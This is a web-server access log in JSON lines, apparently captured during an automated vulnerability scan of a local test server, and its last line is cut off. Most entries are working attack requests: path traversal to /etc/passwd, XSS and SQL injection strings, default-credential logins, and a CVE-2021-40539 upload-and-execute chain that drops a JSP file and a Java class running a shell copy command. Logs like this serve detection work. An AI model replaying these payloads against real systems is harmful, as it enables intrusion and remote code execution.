+{"@timestamp": "13/May/2022:16:36:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /user HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.087","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /uir//etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.087","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /enginemanager/server/logs/download?logType=error&logName=../../../../../../../../etc/passwd&logSource=engine HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.084","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:17 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v1/graphql-explorer HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.114","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_beeheard&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.089","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.gz HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.091","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/66 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.094","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.104","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /install HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.104","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/admin.php?page=mlw_quiz_list&s=\x22>&paged=\x22> HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.104","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /rootDesc.xml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.102","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ucmdb-api/connect HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.104","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /awstats/awredir.pl?url=%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.088","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wps/portal/!ut/p/z1/04_Sj9CPykssy0xPLMnMz0vMAfIjo8ziHd3DQgMNnM3N_M1DjA08PX0NgoNcnQwt3Ez1wwkpiAJKG-AAjgb6BbmhigBypoQ7/dz/d5/L2dBISEvZ0FBIS9nQSEh/?uri=nm:oid:Z6_00000000000000A0BR2B300GG2 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.090","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /lucee/lucees3ezf%3cimg%20src%3da%20onerror%3dalert('297MbA1pKE27W0WzIRjaNDlXQJw')%3elujb7/admin/imgProcess.cfm HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.087","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /sap/public/bc/icf/logoff?redirecturl=https://example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.079","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /plugin/sms5/ajax.sms_emoticon.php?arr_ajax_msg=gnuboard HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.085","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /info.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.094","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?id=50&file=../../../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.097","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/apidocs HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.090","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /duomiphp/ajax.php?action=addfav&id=1&uid=1%20and%20extractvalue(1,concat_ws(1,1,md5(9999999999))) HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.092","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:17 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v1/graphql.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.100","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:17 +0000","request_body":"--8b1ab266c41afb773af2e064bc526458\x0D\x0AContent-Disposition: form-data; name=\x22methodToCall\x22\x0D\x0A\x0D\x0Aunspecified\x0D\x0A--8b1ab266c41afb773af2e064bc526458\x0D\x0AContent-Disposition: form-data; name=\x22Save\x22\x0D\x0A\x0D\x0Ayes\x0D\x0A--8b1ab266c41afb773af2e064bc526458\x0D\x0AContent-Disposition: form-data; name=\x22form\x22\x0D\x0A\x0D\x0Asmartcard\x0D\x0A--8b1ab266c41afb773af2e064bc526458\x0D\x0AContent-Disposition: form-data; name=\x22operation\x22\x0D\x0A\x0D\x0AAdd\x0D\x0A--8b1ab266c41afb773af2e064bc526458\x0D\x0AContent-Disposition: form-data; name=\x22CERTIFICATE_PATH\x22; filename=\x22ws.jsp\x22\x0D\x0A\x0D\x0A<%@ page import=\x22java.util.*,java.io.*\x22%>\x0D\x0A<%@ page import=\x22java.security.MessageDigest\x22%>\x0D\x0A<%\x0D\x0AString cve = \x22CVE-2021-40539\x22;\x0D\x0AMessageDigest alg = MessageDigest.getInstance(\x22MD5\x22);\x0D\x0Aalg.reset();\x0D\x0Aalg.update(cve.getBytes());\x0D\x0Abyte[] digest = alg.digest();\x0D\x0AStringBuffer hashedpasswd = new StringBuffer();\x0D\x0AString hx;\x0D\x0Afor (int i=0;i\x0D\x0A--8b1ab266c41afb773af2e064bc526458--\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /./RestAPI/LogonCustomization HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.095","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /phpwiki/index.php/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.077","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/67 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.091","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:17 +0000","request_body":"{\x22username\x22:\x22admin\x22,\x22password\x22:\x22arlpass\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /api/user/login HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.084","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.084","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/video-synchro-pdf/reglages/Menu_Plugins/tout.php?p=../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.101","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.075","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cf_scripts/scripts/ajax/package/cfajax.js HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.084","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /../../../../../../../../../../../../etc/passwd HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.001","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cgi-bin/awstats/awredir.pl?url=%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.074","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wgarcmin.cgi?NEXTPAGE=D&ID=1&DOC=../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.068","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wps/portal/!ut/p/z1/04_Sj9CPykssy0xPLMnMz0vMAfIjo8ziDVCAo4FTkJGTsYGBu7uRfjhYgaN7WGiggbO5mb95iLGBp6evQXCQq5OhhZupfhSGfmSToPrxWEBQfxRYSYCHh5mHoYWBj7-RL1DC1y3M2NXCx9jA3RiqAI8ZBbmhEQaZjooABQv7ag!!/dz/d5/L2dBISEvZ0FBIS9nQSEh/dz/d5/L0lJSkdKSUtVSklKQ2dwUkNncFJBL29Od3dBQUFZUUFBRUl3UWxDVTVBQUdNSUtTcEtGTFJ0R0ZvIS80TmxFTklVTVFuRmR1WXBNaFFUVWs1Q2ltcHBBL1o2XzAwMDAwMDAwMDAwMDAwQTBCUjJCMzAwR1YwL1o3XzAwMDAwMDAwMDAwMDAwQTBCUjJCMzAwSU8wL25vcm1hbC9PQ04vWjZfMDAwMDAwMDAwMDAwMDBBMEJSMkIzMDBHRzIvYW8vdGht/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.075","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /sell-media-search/?keyword=%22%3E%3Cscript%3Ealert%281337%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.087","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_drawroot&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.064","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /overview.asp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.062","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/swagger HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.064","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /infophp.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.070","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:17 +0000","request_body":"--43992a07d9a30213782780204a9f032b\x0D\x0AContent-Disposition: form-data; name=\x22methodToCall\x22\x0D\x0A\x0D\x0Aunspecified\x0D\x0A--43992a07d9a30213782780204a9f032b\x0D\x0AContent-Disposition: form-data; name=\x22Save\x22\x0D\x0A\x0D\x0Ayes\x0D\x0A--43992a07d9a30213782780204a9f032b\x0D\x0AContent-Disposition: form-data; name=\x22form\x22\x0D\x0A\x0D\x0Asmartcard\x0D\x0A--43992a07d9a30213782780204a9f032b\x0D\x0AContent-Disposition: form-data; name=\x22operation\x22\x0D\x0A\x0D\x0AAdd\x0D\x0A--43992a07d9a30213782780204a9f032b\x0D\x0AContent-Disposition: form-data; name=\x22CERTIFICATE_PATH\x22; filename=\x22Si.class\x22\x0D\x0A\x0D\x0A\xCA\xFE\xBA\xBE\x00\x00\x004\x00(\x0D\x0A\x00\x0C\x00\x16\x0D\x0A\x00\x17\x00\x18\x07\x00\x19\x08\x00\x1A\x08\x00\x1B\x08\x00\x1C\x08\x00\x1D\x08\x00\x1E\x0D\x0A\x00\x17\x00\x1F\x07\x00 \x07\x00!\x07\x00\x22\x01\x00\x06\x01\x00\x03()V\x01\x00\x04Code\x01\x00\x0FLineNumberTable\x01\x00\x08\x01\x00\x0D\x0AStackMapTable\x07\x00 \x01\x00\x0D\x0ASourceFile\x01\x00\x07Si.java\x0C\x00\x0D\x0A\x00\x0E\x07\x00#\x0C\x00$\x00%\x01\x00\x10java/lang/String\x01\x00\x03cmd\x01\x00\x02/c\x01\x00\x04copy\x01\x00\x06ws.jsp\x01\x00*..\x5Cwebapps\x5Cadssp\x5Chelp\x5Cadmin-guide\x5Ctest.jsp\x0C\x00&\x00'\x01\x00\x13java/io/IOException\x01\x00\x02Si\x01\x00\x10java/lang/Object\x01\x00\x11java/lang/Runtime\x01\x00\x0D\x0AgetRuntime\x01\x00\x15()Ljava/lang/Runtime;\x01\x00\x04exec\x01\x00(([Ljava/lang/String;)Ljava/lang/Process;\x00!\x00\x0B\x00\x0C\x00\x00\x00\x00\x00\x02\x00\x01\x00\x0D\x0A\x00\x0E\x00\x01\x00\x0F\x00\x00\x00\x1D\x00\x01\x00\x01\x00\x00\x00\x05*\xB7\x00\x01\xB1\x00\x00\x00\x01\x00\x10\x00\x00\x00\x06\x00\x01\x00\x00\x00\x02\x00\x08\x00\x11\x00\x0E\x00\x01\x00\x0F\x00\x00\x00d\x00\x05\x00\x02\x00\x00\x00+\xB8\x00\x02K*\x08\xBD\x00\x03Y\x03\x12\x04SY\x04\x12\x05SY\x05\x12\x06SY\x06\x12\x07SY\x07\x12\x08S\xB6\x00\x09L\xA7\x00\x04K\xB1\x00\x01\x00\x00\x00&\x00)\x00\x0D\x0A\x00\x02\x00\x10\x00\x00\x00\x12\x00\x04\x00\x00\x00\x05\x00\x04\x00\x06\x00&\x00\x07\x00*\x00\x08\x00\x12\x00\x00\x00\x07\x00\x02i\x07\x00\x13\x00\x00\x01\x00\x14\x00\x00\x00\x02\x00\x15\x0D\x0A--43992a07d9a30213782780204a9f032b--\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /./RestAPI/LogonCustomization HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.060","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:17 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v1/graphql/console HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.074","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:17 +0000","request_body":"log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-login.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.071","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /auth/login/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.071","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /admin/elfinder/elfinder-cke.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.062","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/68 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.071","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cf-scripts/scripts/ajax/package/cfajax.js HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.079","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /favicon.ico HTTP/1.1","status":"200","body_bytes_sents":"4286","req_time":"0.051","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.066","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:17 +0000","request_body":"methodToCall=openSSLTool&action=generateCSR&KEY_LENGTH=1024+-providerclass+Si+-providerpath+%22..%5Cbin%22","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /./RestAPI/Connection HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.062","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /php_info.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.064","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"297Mdl4LObzdiJQAnLIF0TxbnkL.tld","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.064","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) 